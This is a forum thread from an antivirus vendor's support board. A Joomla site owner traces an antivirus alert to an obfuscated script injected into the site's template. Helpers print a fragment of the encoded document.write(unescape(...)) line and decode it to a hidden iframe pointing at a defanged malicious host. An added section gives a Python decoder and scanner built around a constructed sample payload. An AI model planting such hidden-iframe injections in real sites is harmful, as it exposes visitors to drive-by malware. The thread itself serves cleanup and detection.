Topic: JS:ScriptPE-inf [Trj] on my website

M3rl3n (Guest)
JS:ScriptPE-inf [Trj] on my website
« on: April 20, 2009, 04:56:42 AM »
The only reference that I have seen regarding this Trojan Horse is when it infects a person's personal computer. My case is different. I have a personal (well, semi-professional) website hxxp://www.briodanphoto.com and whenever I connect to the website, I get a warning saying that "hXXp://www.briodanphoto.com/\{gzip} contains a sample of JS:ScriptPE-inf [trj]!" I have connected to the website from work, and many of my friends have connected to the website without this warning popping up. I saw the reference to the favicon and I deleted that from the website, but the warning keeps coming up. I am running Joomla on the website, and if my website were truly hosting a trojan horse, I'm sure that my hosting company would have eradicated it for me.

Any thoughts? I'd like to be able to view my website again.

Thanks.
« Last Edit: April 20, 2009, 04:53:08 PM by kubecj »

CharleyO (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #1 on: April 20, 2009, 09:04:01 AM »
***

When I visited your site, I got the "On-Access Scanner" message shown in the image below.

I could not see the problem in the source but perhaps DavidR or someone else more adept can spot it.


***

Lisandro (Avast team)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #2 on: April 20, 2009, 02:23:12 PM »
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
The best things in life are free.

M3rl3n (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #3 on: April 20, 2009, 04:14:32 PM »
Other than the different type of message that CharleyO got about the viagra link, which makes me think that someone may have thrown in a PHP script on me, the content of the site remains unchanged. So it was not "hacked" per se.   ???

Tonight when I get home I will try to find that php code and get rid of it.

What is interesting is that last night as I typed my message, I left the website and Avast! warning up, and eventually I saw the front page of my site, but of course as soon as I try to get rid of the Avast! warning to see the site, the site goes away because the connection was interrupted.

Thanks for all the help. 

kubecj (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #4 on: April 20, 2009, 04:53:35 PM »
This is at the very beginning of the page:
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%69%61%67%72%61%31%2E%61%74%68%2E%63%....

which means
iframe src="hXXp://viagra1.ath.cx/15/js_go_f1.php" style="display:none"

So avast! is right (again).

DavidR (Avast Überevangelist)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #5 on: April 20, 2009, 05:11:02 PM »
kubecj, how do you interpret the obfuscated text?

I did try a search to find a tool that would interpret this but I guess my search term wasn't good.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

polonus (Avast Überevangelist, malware fighter)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #6 on: April 20, 2009, 07:21:29 PM »
Hi DavidR,

Here they describe a way to do it using Spidermonkey for de-obfuscation or redux:
http://isc.sans.org/diary.html?storyid=4724
Did you mean this? http://www.gosu.pl/JsDecoder/
Interesting tool: http://securitylabs.websense.com/content/Blogs/3198.aspx

polonus
« Last Edit: April 20, 2009, 08:40:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

DavidR (Avast Überevangelist)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #7 on: April 20, 2009, 09:11:11 PM »
Well, it is a Javascript unescape decoder that I was trying to find, and I did find a site where I could copy the code into and have it decoded, http://www.felgall.com/javamet6.htm.

But I was hoping for an off-line tool, similar to what is performed on that site.

M3rl3n (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #8 on: April 20, 2009, 09:35:53 PM »
Ok... Thanks for the info.  I am a noob to Joomla, but I do believe that I should be able to get into the code, figure out the offending lines of code and get rid of them. If any of you have an idea as to an easy way to do that, I would appreciate it.

Thanks Again.   :)

M3rl3n (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #9 on: April 21, 2009, 02:08:16 AM »
I GOT IT!!!   ;D

Thanks All.

For those with Joomla on your websites. If this situation happens to you, it is in the index.php of your active (default) template folder. Find the line as mentioned above and delete it, re-saving your index.php file back to the correct directory on the host.

Easy way to test for this...  can't believe I didn't think of it...  switch templates in administrator and reload your website on another browser window..  if it comes up without an Avast! warning, then there you go.  ;)

Thanks Again!!

DavidR (Avast Überevangelist)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #10 on: April 21, 2009, 03:11:13 AM »
Now what you have to do is try and prevent a recurrence.

Change your passwords for uploads/modification, etc. to one that is stronger. These attacks are also associated with old versions of php software which is vulnerable, so you have to ensure that it is up to date too.

kubecj (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #11 on: April 21, 2009, 09:34:02 AM »
Regarding unescaping - we have our internal tools written, don't know if there is any stuff 'out there'.
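DavidR asked for an offline way to decode the document.write( unescape( '%3C%69...' ) ) string that kubecj decoded by hand, and M3rl3n found the injected line in the active template's index.php. The script below is an added example written for this thread; it is not a tool from avast, from kubecj, or from the Joomla project. It reproduces JavaScript's unescape() (including the %uXXXX form, which urllib.parse.unquote does not handle), pulls any iframe out of the decoded text, flags the hidden ones, and can walk a copy of the site's files to find which file carries the injection. The payload and the template text it scans are constructed samples; the host name malicious.example is a placeholder and not the host shown in the thread.

```python
"""Offline decoder/scanner for the document.write(unescape('%3C...')) injection.

Added example for this forum thread, not a tool from avast or the Joomla
project. The payload and template text below are CONSTRUCTED samples;
'malicious.example' is a placeholder host, not the host named in the thread.
"""
import os
import re

# JavaScript unescape() turns %XX into the character with that code point
# and %uXXXX into the UTF-16 code unit XXXX. urllib.parse.unquote does
# neither correctly (it is UTF-8 based and ignores %uXXXX), so do it by hand.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Reproduce JavaScript's unescape() for percent-encoded payloads."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def full_escape(s: str) -> str:
    """Encode every character as %XX, the way the injected scripts do.
    Used here only to build the constructed sample payload."""
    return "".join("%%%02X" % ord(c) for c in s)


# document.write( unescape( '...' ) ) with either quote style, any spacing.
_WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)
_IFRAME = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*(['\"])(.*?)\1[^>]*>",
                     re.IGNORECASE | re.DOTALL)
# display:none or a zero-sized frame: the usual ways to keep the iframe invisible.
_HIDDEN = re.compile(r"display\s*:\s*none|\b(?:width|height)\s*=\s*['\"]?0\b",
                     re.IGNORECASE)


def find_injected_iframes(text: str) -> list:
    """Decode every document.write(unescape()) call in `text` and return
    (decoded_html, iframe_src, is_hidden) for each iframe it produces."""
    hits = []
    for m in _WRITE_UNESCAPE.finditer(text):
        decoded = js_unescape(m.group(2))
        for tag in _IFRAME.finditer(decoded):
            hits.append((decoded, tag.group(2), bool(_HIDDEN.search(tag.group(0)))))
    return hits


def scan_tree(root: str, exts=(".php", ".html", ".js")) -> dict:
    """Walk a local copy of the site (e.g. the Joomla templates/ directory) and
    map each file to the injected iframes found in it. Files are read as
    Latin-1 so binary junk cannot abort the scan."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    hits = find_injected_iframes(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Constructed sample: an infected template index.php, with the hidden iframe
# hex-encoded in the same style as the thread's payload (placeholder host).
ENCODED_PAYLOAD = full_escape(
    '<iframe src="http://malicious.example/x.php" style="display:none"></iframe>'
)
SAMPLE_INDEX_PHP = (
    "<?php defined('_JEXEC') or die('Restricted access'); ?>\n"
    "<script>document.write( unescape( '" + ENCODED_PAYLOAD + "' ) );</script>\n"
    "<!DOCTYPE html>\n<html><head><title>site</title></head><body>ok</body></html>\n"
)

if __name__ == "__main__":
    for decoded, src, hidden in find_injected_iframes(SAMPLE_INDEX_PHP):
        print("injected iframe ->", src, "(hidden)" if hidden else "")
        print("decoded:", decoded)
```

Run it as a script to see the constructed sample decoded, or download the site's files and call scan_tree("templates") from a Python shell to get the exact file the injection lives in, which is the file to clean and re-upload as described above.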

DavidR (Avast Überevangelist)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #12 on: April 21, 2009, 03:53:45 PM »
Thanks, looks like I will have to stick with that web site I found and a copy and paste job to see what is hidden.

Unless of course one of those unescape tools happens to turn up in my inbox ;D

M3rl3n (Guest)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #13 on: April 21, 2009, 06:24:01 PM »
I did some checking.  I was hacked. What happened is: I did add myself as admin with a couple of different names, and much stronger passwords, but I had left the default "admin" login active (although how they got through that password is interesting...  it was a tough one). So any way...  the default admin account is now gone.

Thanks again all!! 

DavidR (Avast Überevangelist)
Re: JS:ScriptPE-inf [Trj] on my website
« Reply #14 on: April 21, 2009, 07:15:34 PM »
The passwords that I referred to are mainly those used to modify the site, e.g. upload the files or modify files on-line, etc.

Since you feel that it originated from the default template index.html, that could have been infected by other malware without needing to hack any windows user passwords.

If you haven't already got this software (freeware), download, install, update and run it and report the findings (it should produce a log file).